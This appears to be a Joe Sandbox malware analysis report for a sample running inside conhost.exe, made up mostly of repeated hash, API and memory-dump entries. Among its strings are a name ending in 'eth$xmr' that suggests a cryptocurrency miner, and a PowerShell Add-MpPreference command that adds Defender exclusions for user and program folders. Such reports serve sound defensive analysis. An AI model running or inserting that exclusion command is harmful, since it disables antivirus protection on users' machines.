                                                                                                                                                              • Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: wcscpywcslen
                                                                                                                                                              • String ID: \BaseNamedObjects\exwrdtlzvhyfkapm$eth$xmr
                                                                                                                                                              • API String ID: 225642448-1773558661
                                                                                                                                                              • Opcode ID: 7c18e1d428280e2747470cd5def9a742f52c0f2b5d66f3f326576d4d2a1232b9
                                                                                                                                                              • Instruction ID: 5920cdd89c1ceaf075a96220a341596d031455aedab68939c363c84460120d54
                                                                                                                                                              • Opcode Fuzzy Hash: 7c18e1d428280e2747470cd5def9a742f52c0f2b5d66f3f326576d4d2a1232b9
                                                                                                                                                              • Instruction Fuzzy Hash: C131E723608241D5E6209F11A4093BA76A0FB8D7A4F884635EE5C827FDEF3EE04D8709
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true
                                                                                                                                                              • Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memsetwcscatwcscpywcslen
                                                                                                                                                              • String ID: \??\
                                                                                                                                                              • API String ID: 468205783-3047946824
                                                                                                                                                              • Opcode ID: bd374edfa0390df58b4f4020f654e493c944218ec62c4d8a60d6fd753a781144
                                                                                                                                                              • Instruction ID: 91bc46374053170d0188c1167bf23d449420ec1c3e2498209a6470c08028db97
                                                                                                                                                              • Opcode Fuzzy Hash: bd374edfa0390df58b4f4020f654e493c944218ec62c4d8a60d6fd753a781144
                                                                                                                                                              • Instruction Fuzzy Hash: CC31AF22A19B86C4F7149F75E8153793360AF5D394F044235DA8C9A3BDEF7EA089830E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • VirtualProtect.KERNEL32(00007FF6EB455A18,00007FF6EB455A10,00007FF6EB454EE0,00007FFDB240ADA0,?,?,?,00000001,00007FF6EB43124C), ref: 00007FF6EB43D98D
                                                                                                                                                                • Part of subcall function 00007FF6EB43D5D0: VirtualQuery.KERNEL32 ref: 00007FF6EB43D67B
                                                                                                                                                              Strings
                                                                                                                                                              • Unknown pseudo relocation bit size %d., xrefs: 00007FF6EB43DB0A
                                                                                                                                                              • Unknown pseudo relocation protocol version %d., xrefs: 00007FF6EB43DB32
                                                                                                                                                              • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF6EB43DB23
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true
                                                                                                                                                              • Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Virtual$ProtectQuery
                                                                                                                                                              • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                                                                                                                                                              • API String ID: 1027372294-1286557213
                                                                                                                                                              • Opcode ID: 17fb590d4bf6312f56afb5f126a8fda7ea48e215cf51e2478acf702bcb2b2b33
                                                                                                                                                              • Instruction ID: d73fb5c27d2fd4a43f2aa13b0875abbf846e0bfdcfbd9e6da2172669011f8795
                                                                                                                                                              • Opcode Fuzzy Hash: 17fb590d4bf6312f56afb5f126a8fda7ea48e215cf51e2478acf702bcb2b2b33
                                                                                                                                                              • Instruction Fuzzy Hash: 9F91D123F09A42C5EB20AB2599087792260BF4D794F184231CD2DA77FCDE3EE549C71A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true
                                                                                                                                                              • Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: freememcpystrlen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2208669145-0
                                                                                                                                                              • Opcode ID: c38db2172cfd9ae85e9a883efc34efb28d12d5d224bd24a361e312a999cd5c63
                                                                                                                                                              • Instruction ID: 38c9c533ea50aa33719c106f85b10d7e471b42fae95de4da2564e67b5fd56846
                                                                                                                                                              • Opcode Fuzzy Hash: c38db2172cfd9ae85e9a883efc34efb28d12d5d224bd24a361e312a999cd5c63
                                                                                                                                                              • Instruction Fuzzy Hash: C0310763A0D642D1FA626E116E4837891606F897E0F1C4230ED5DA7BFCDE3DD449830B
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true
                                                                                                                                                              • Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Byte$CharLeadMultiWide
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2561704868-0
                                                                                                                                                              • Opcode ID: 2afb99f2ee01c53e0d00abda62e8cbbf8cc0c827b66b9bada8882682575d719f
                                                                                                                                                              • Instruction ID: 66aa87953a95e4e37b51063a2905608f4c439687da8c228d4e71882d812df52b
                                                                                                                                                              • Opcode Fuzzy Hash: 2afb99f2ee01c53e0d00abda62e8cbbf8cc0c827b66b9bada8882682575d719f
                                                                                                                                                              • Instruction Fuzzy Hash: 1231C773A0C6D1C6E3604F65B4003AD36A0BB88754F588175EA98C77E9CF3ED49ACB05
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true
                                                                                                                                                              • Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: wcslen
                                                                                                                                                              • String ID: 0$@
                                                                                                                                                              • API String ID: 4088430540-1545510068
                                                                                                                                                              • Opcode ID: 7672fed0b8996f53dcc22994f3d6380cf8a7774dacfee888ad8ec0ec5c6d97f5
                                                                                                                                                              • Instruction ID: 43f9203b635bf991cf92537642e3d60c068741ff74efacdb396524939c7aaf7d
                                                                                                                                                              • Opcode Fuzzy Hash: 7672fed0b8996f53dcc22994f3d6380cf8a7774dacfee888ad8ec0ec5c6d97f5
                                                                                                                                                              • Instruction Fuzzy Hash: FB212C3261878086E3208BA9F44579BB6B4FBC8794F544135EB8887B69EF7DD059CB04
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true
                                                                                                                                                              • Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: strlen
                                                                                                                                                              • String ID: this${parm#$}
                                                                                                                                                              • API String ID: 39653677-3278767634
                                                                                                                                                              • Opcode ID: 6f0bfb9d8981c506edbbfefa79d7d61ad08a34af9d75f983c161daac188581c0
                                                                                                                                                              • Instruction ID: 7dcce3cdf6aece54b59c52b66014cab3d709c33f864844e2d74f4606f4273d2d
                                                                                                                                                              • Opcode Fuzzy Hash: 6f0bfb9d8981c506edbbfefa79d7d61ad08a34af9d75f983c161daac188581c0
                                                                                                                                                              • Instruction Fuzzy Hash: 35219473A8C686C1EB268F2494043FD2291EB09B94F4C4032CE4D4B76DDF7E948AC366
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true
                                                                                                                                                              • Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: wcslen
                                                                                                                                                              • String ID: 0$@
                                                                                                                                                              • API String ID: 4088430540-1545510068
                                                                                                                                                              • Opcode ID: 3c516be1024ba130d95ecd01f241a1d218f72ae396bc0abe8a08652b93ab77ee
                                                                                                                                                              • Instruction ID: 82d12c3580c25b514c551640d37957c6602e0c2759aad2bde90a10f0744603ef
                                                                                                                                                              • Opcode Fuzzy Hash: 3c516be1024ba130d95ecd01f241a1d218f72ae396bc0abe8a08652b93ab77ee
                                                                                                                                                              • Instruction Fuzzy Hash: B9118F22618B8186E7109BA5F48539BA770EFC8354F540135FB8C87B69EF7EC48ACB04
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true
                                                                                                                                                              • Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: wcslen
                                                                                                                                                              • String ID: %S Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force$0$@
                                                                                                                                                              • API String ID: 4088430540-3278736299
                                                                                                                                                              • Opcode ID: fdb8abad6e72a7b41242dcd54f2c36b93f86f5da5fb55729cbb4a91078180f25
                                                                                                                                                              • Instruction ID: ccca69274cde80a48966c7e6d0687dd5bfee1739f4824bdc0650d77fb775496d
                                                                                                                                                              • Opcode Fuzzy Hash: fdb8abad6e72a7b41242dcd54f2c36b93f86f5da5fb55729cbb4a91078180f25
                                                                                                                                                              • Instruction Fuzzy Hash: 01F08162628780C2E7108BA4F08939AA370EBC8354F641125F78C87B69EF3DC5958B04
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true
                                                                                                                                                              • Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: fprintf
                                                                                                                                                              • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                              • API String ID: 383729395-3474627141
                                                                                                                                                              • Opcode ID: a32f6bde19f3212d88517c0bbb2d0dc8b7ac313c33bdf2c9871b021261022c37
                                                                                                                                                              • Instruction ID: 80a9a88dc9293757fb9ad4033c664ff5fb6cb1814c2d65201d7a039fc6addd41
                                                                                                                                                              • Opcode Fuzzy Hash: a32f6bde19f3212d88517c0bbb2d0dc8b7ac313c33bdf2c9871b021261022c37
                                                                                                                                                              • Instruction Fuzzy Hash: 4E01A923908E88C2D6128F1CD8012EA7374FF9E79AF245321EA8C66234DF2AD557C704
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true
                                                                                                                                                              • Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: fprintf
                                                                                                                                                              • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                              • API String ID: 383729395-4273532761
                                                                                                                                                              • Opcode ID: 67d5240dc17468b9f01daf06f5fc5db78ffbb280dddb193a6db7ce23348b68e9
                                                                                                                                                              • Instruction ID: eeaf11c9e9b30f10159501bb5e885e6d108c4259b1de9e0544a57acb53c2cea1
                                                                                                                                                              • Opcode Fuzzy Hash: 67d5240dc17468b9f01daf06f5fc5db78ffbb280dddb193a6db7ce23348b68e9
                                                                                                                                                              • Instruction Fuzzy Hash: C5F06213908E88C2D2018F1CA8002FAB370FF9E789F685325EACD76538DF2AD6578704
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true
                                                                                                                                                              • Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: fprintf
                                                                                                                                                              • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                              • API String ID: 383729395-2187435201
                                                                                                                                                              • Opcode ID: e7b94ecd4896b4551adee426744aa3e5072b9381a04d8ab2df02db5d513518aa
                                                                                                                                                              • Instruction ID: 0ba641bc1922b7ed5be4af2022124b119f5c3f54080dff35307b3648232e1fa4
                                                                                                                                                              • Opcode Fuzzy Hash: e7b94ecd4896b4551adee426744aa3e5072b9381a04d8ab2df02db5d513518aa
                                                                                                                                                              • Instruction Fuzzy Hash: C3F06213908E88C2D2018F1CA8002AAB370FF9E789F685325EA8D76578DF2AD6578704
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true
                                                                                                                                                              • Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: fprintf
                                                                                                                                                              • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                              • API String ID: 383729395-2468659920
                                                                                                                                                              • Opcode ID: c91a2dc0f6ff7d737807e0476af162ad0af9d5283553f49d171d24ddf17aa2d3
                                                                                                                                                              • Instruction ID: b9baf2fb9f919a8f401f2064eb91ac376e646149a8b43c996e9dbffc8a67432b
                                                                                                                                                              • Opcode Fuzzy Hash: c91a2dc0f6ff7d737807e0476af162ad0af9d5283553f49d171d24ddf17aa2d3
                                                                                                                                                              • Instruction Fuzzy Hash: 19F06853908E88C1D201CF1CA4001AA7371FF5E789F585325DA8D76534DF29D5578704
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true
                                                                                                                                                              • Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: fprintf
                                                                                                                                                              • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                              • API String ID: 383729395-4283191376
                                                                                                                                                              • Opcode ID: 83a1a42ba51afc0977b47f15b4cc2797ba7c15fed2a33f244b538e2cfb76ad28
                                                                                                                                                              • Instruction ID: bd08564df51834cd210785110b5109ae05659a68b2a0fd08df933e2ae1ba23c8
                                                                                                                                                              • Opcode Fuzzy Hash: 83a1a42ba51afc0977b47f15b4cc2797ba7c15fed2a33f244b538e2cfb76ad28
                                                                                                                                                              • Instruction Fuzzy Hash: F1F06813908E88C1D2018F1CA4001AAB370FF5E789F585325EA8D76574DF29D5578704
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true
                                                                                                                                                              • Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: fprintf
                                                                                                                                                              • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                              • API String ID: 383729395-4064033741
                                                                                                                                                              • Opcode ID: 444463960d407b565cb1ce2de017aac15f1105bab8b8e63de992e1bddc256739
                                                                                                                                                              • Instruction ID: 6772089ee98055ad43e3a2b1ec74d454376bb6675be28162958307e861149e84
                                                                                                                                                              • Opcode Fuzzy Hash: 444463960d407b565cb1ce2de017aac15f1105bab8b8e63de992e1bddc256739
                                                                                                                                                              • Instruction Fuzzy Hash: 49F06853918E88C1D2018F1CA4001AA7370FF5E789F585325EA8D76574DF29D5578704
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true
